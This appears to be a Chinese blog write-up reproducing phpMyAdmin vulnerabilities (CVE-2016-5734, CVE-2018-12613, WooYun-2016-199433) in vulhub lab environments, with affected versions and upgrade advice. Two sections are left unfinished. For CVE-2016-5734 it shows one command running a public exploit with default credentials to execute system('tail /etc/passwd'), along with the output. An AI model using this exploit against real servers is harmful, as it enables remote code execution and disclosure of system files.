简介

漏洞环境：不另作说明均为vulhub。

在网上发现一篇文章，比我的强太多太多：https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label2_5

参考链接：

官网：https://www.phpmyadmin.net/

百科：https://baike.baidu.com/item/PhpMyAdmin/9624049?fr=aladdin

PHPMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MysqL的数据库管理工具，让管理者可用Web接口管理MysqL数据库。借由此Web接口可以成为一个简易方式输入繁杂sql语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于PHPMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MysqL数据库，方便的建立、修改、删除数据库及资料表。也可借由PHPMyAdmin建立常用的PHP语法，方便编写网页时所需要的sql语法正确性。

PHPmyadmin相信大家都比较熟悉，因为它集成在PHP study工具中，安全人员为了实验或是搭靶场，该工具一般都使用过。

CVE-2016-5734（PHPMyAdmin认证用户远程代码执行漏洞）

参考链接：

https://zgao.top/从cve-2016-5734分析由preg_replace引发的rce/

exp：https://www.exploit-db.com/download/40185

在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。

漏洞影响版本：

• 4.0.10.16之前4.0.x版本
• 4.4.15.7之前4.4.x版本
• 4.6.3之前4.6.x版本

漏洞复现

emm，这个网上已经有现成的exp了，但是是有利用条件的，除了符合版本要求外，还需要知道PHPmyadmin的用户名和密码，并指定数据库。

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 40185 -u root -p root -d test http://139.198.172.202:8080 -c 'system("tail /etc/passwd")'

/home/kali/Desktop/40185:60: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if resp.status_code is 200:
result: data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

emm，知道PHPmyadmin的用户名及密码的话，可操作性还是有的。

漏洞修复

• 升级PHPmyadmin的版本。

CVE-2018-12613（本地文件包含造成远程代码执行漏洞复现）

参考链接：

https://blog.csdn.net/qq_34444097/article/details/85264686

漏洞影响版本：

• PHPmyadmin PHPmyadmin 4.8.0
• PHPmyadmin PHPmyadmin 4.8.0.1
• PHPmyadmin PHPmyadmin 4.8.1

漏洞复现

emm，这个漏洞的利用条件跟CVE-2016-5734有点像，都需要有PHPmyadmin的账户和密码，先空。

漏洞修复

WooYun-2016-199433

参考链接：

https://blog.csdn.net/qq_41832837/article/details/110277824

PHPmyadmin 2.x版本中存在一处反序列化漏洞，通过该漏洞，攻击者可以读取任意文件或执行任意代码。

漏洞影响版本：

• PHPmyadmin 2.x

漏洞复现

环境启动不了

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。